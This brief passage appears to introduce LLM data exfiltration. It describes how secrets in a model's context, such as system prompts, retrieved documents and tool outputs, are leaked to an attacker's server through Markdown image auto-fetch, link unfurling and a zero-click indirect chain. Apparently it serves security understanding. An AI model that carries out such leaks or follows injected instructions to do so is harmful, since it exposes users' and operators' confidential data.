LLM Data Exfiltration

A model holds secrets in its context — the system prompt, retrieved documents, earlier turns, tool outputs. Exfiltration is the problem of getting those out to a server the attacker controls, and the model's own output-rendering surface is the channel. Markdown image auto-fetch, link unfurling, and the zero-click indirect chain that needs no user action at all.